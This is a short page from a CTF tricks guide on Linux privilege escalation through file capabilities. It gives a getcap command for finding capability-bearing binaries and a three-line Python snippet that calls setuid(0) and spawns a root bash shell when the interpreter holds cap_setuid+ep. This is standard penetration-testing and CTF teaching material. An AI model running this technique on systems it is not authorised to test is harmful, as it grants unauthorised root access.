> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/linux/capabilities/trick-0377.md).

# Discover Elevated Linux Capabilities

***

Identify binaries with elevated Linux capabilities set using `getcap`. Capabilities allow specific privileged actions without full root access, representing potential privilege escalation paths.

Recursively scan the filesystem for binaries with capabilities:

```bash
getcap -r / 2>/dev/null
```

This command lists files with set capabilities. The output typically shows the file path followed by the capability and flags, for example, `/usr/bin/python2.7 = cap_setuid+ep`. The `+ep` indicates that the capability is both `effective` and `permitted`.

Pay particular attention to capabilities like `cap_setuid`, which allows changing the effective user ID and can be exploited to gain higher privileges, often leading to root. The `cap_setgid` capability is also significant as it allows changing the effective group ID.

If a binary such as Python has the `cap_setuid+ep` capability set, it can be used to execute commands as the root user. A simple Python script can leverage this capability:

```python
import os
os.setuid(0)
os.system("/bin/bash")
```

This code will set the UID of the current process to 0 (root) and then execute a bash shell. If the Python binary has `cap_setuid+ep` set, this script will effectively grant you a root shell.
